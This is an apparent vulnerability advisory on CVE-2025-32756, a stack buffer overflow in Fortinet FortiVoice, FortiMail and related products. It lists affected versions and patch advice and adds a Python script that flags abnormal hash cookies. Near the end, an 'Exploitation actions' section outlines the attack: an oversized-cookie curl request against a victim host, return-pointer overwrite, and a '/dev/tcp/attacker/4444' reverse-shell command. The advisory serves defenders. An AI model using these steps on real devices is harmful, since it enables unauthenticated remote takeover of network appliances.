Fortinet products: stack-based buffer overflow (CVE-2025-32756)
Summary
Fortinet has released a patch for CVE-2025-32756, a critical zero-day vulnerability that has been actively exploited in the wild to target FortiVoice systems and other Fortinet products. This flaw allows remote attackers to execute unauthorized code without authentication, posing significant risk to affected networks.
Product details
The vulnerability impacts several Fortinet products and versions:
- FortiVoice: 7.2.0, 7.0.0–7.0.6, 6.4.0–6.4.10
- FortiRecorder: 7.2.0–7.2.3, 7.0.0–7.0.5, 6.4.0–6.4.5
- FortiMail: 7.6.0–7.6.2, 7.4.0–7.4.4, 7.2.0–7.2.7, 7.0.0–7.0.8
- FortiNDR: 7.6.0, 7.4.0–7.4.7, 7.2.0–7.2.4, 7.0.0–7.0.6
- FortiCamera: 2.1.0–2.1.3, all 2.0.x, 1.1.x
Vulnerability type summary
CVE-2025-32756 is a stack-based buffer overflow (CWE-121) that enables remote, unauthenticated attackers to execute arbitrary code or commands on affected devices.
Details of the vulnerability
An attacker can exploit this flaw by sending specially crafted HTTP requests containing a malicious hash cookie to the web interface of an affected Fortinet product. The malformed cookie overflows a fixed-size buffer on the stack, overwriting control data and enabling the execution of attacker-supplied payloads with system privileges. Proof-of-concept exploits have already surfaced, and active exploitation has been observed in targeted attacks against FortiVoice systems.
Conclusion
Administrators should immediately apply the security updates released on May 13, 2025, for all impacted Fortinet products. Ensure that web interfaces are not exposed to untrusted networks, monitor logs for suspicious HTTP requests with abnormal cookies, and review your intrusion detection signatures to guard against exploitation attempts.
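One way to act on the "monitor for abnormal cookies" advice, as an added example that is not part of the original page or any Fortinet tooling: a Python check that parses raw HTTP request heads (for example from a reverse proxy or packet capture) and flags a `hash` cookie that is oversized or not plain text. The length limit, the allowed alphabet and the sample requests are assumptions to tune against your own traffic.

```python
import re

MAX_HASH_LEN = 128  # assumption: set to the longest legitimate value in your own traffic
TOKEN_RE = re.compile(rb"[A-Za-z0-9+/=_-]*")  # assumption: legitimate values are hex/base64 text

def cookies_from_request(raw: bytes) -> dict:
    """Return {name: [values]} for every Cookie header in a raw HTTP request head."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    jar = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"cookie":
            for pair in value.split(b";"):
                key, eq, val = pair.strip().partition(b"=")
                if eq:
                    jar.setdefault(key.decode("latin-1"), []).append(val)
    return jar

def inspect_request(raw: bytes) -> list:
    """Return findings for the `hash` cookie; an empty list means nothing suspicious."""
    findings = []
    for val in cookies_from_request(raw).get("hash", []):
        if len(val) > MAX_HASH_LEN:
            findings.append(f"hash cookie length {len(val)} exceeds {MAX_HASH_LEN}")
        if not TOKEN_RE.fullmatch(val):
            findings.append("hash cookie contains bytes outside the expected alphabet")
    return findings

# Constructed sample requests (not captured traffic); host name is a placeholder.
HEAD = b"GET /login HTTP/1.1\r\nHost: appliance.example\r\n"
SAMPLES = {
    "normal": HEAD + b"Cookie: lang=en; hash=9f86d081884c7d659a2feaa0c55ad015\r\n\r\n",
    "oversized": HEAD + b"Cookie: hash=" + b"A" * 2048 + b"\r\n\r\n",
    "non_text": HEAD + b"cookie: hash=ab\x01\xffcd\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, inspect_request(raw) or "ok")
```

The same two checks (length and character set) can be expressed as a WAF or IDS rule in front of the management interface.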
Remediation and exploitation details
This chain involves the following actors
- Remote Unauthenticated Attacker: Exploits public HTTP interface to gain code execution
- System Administrator: Installs patches and monitors systems
The following systems are involved
- FortiVoice (Voice over IP call management): Provides telephony and conferencing services
- FortiRecorder (Call recording and archiving): Stores and retrieves audio recordings
- FortiMail (Email security gateway): Filters and scans inbound and outbound mail
- FortiNDR (Network detection and response): Identifies and responds to threats in network traffic
- FortiCamera (Video surveillance): Streams and records security camera feeds
Attack entry point
- HTTP management endpoint: Publicly exposed web interface listening on port 80 or 443
- Hash cookie field: Session cookie parameter that is not properly bounds-checked
Remediation actions
Exploitation actions
Port and service discovery
- Use a network scanner to identify hosts with open TCP 80/443
Overflow the hash cookie buffer
- Set Cookie: hash=<2000+ byte payload>[shellcode][return address overwrite]
Send HTTP GET or POST with oversized cookie header
- curl -k -H "Cookie: hash=<overflow>" https://victim-ip/login
Buffer overflow control-flow hijack
- Overwrite saved return pointer to jump into injected shellcode
Spawn reverse shell or write backdoor
- Invoke system(“/bin/sh -i >& /dev/tcp/attacker/4444 0>&1”)
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://fortiguard.fortinet.com/psirt/FG-IR-25-254
- [2025-05-14] Fortinet has patched a critical zero-day vulnerability, CVE-2025-32756, exploited in attacks on FortiVoice systems.
- [2025-05-14] CVE-2025-32756, a stack-based buffer overflow affecting multiple Fortinet products, has been exploited in the wild.
- [2025-05-13] Fortinet patched a critical vulnerability (CVE-2025-32756) exploited in the wild to compromise FortiVoice systems.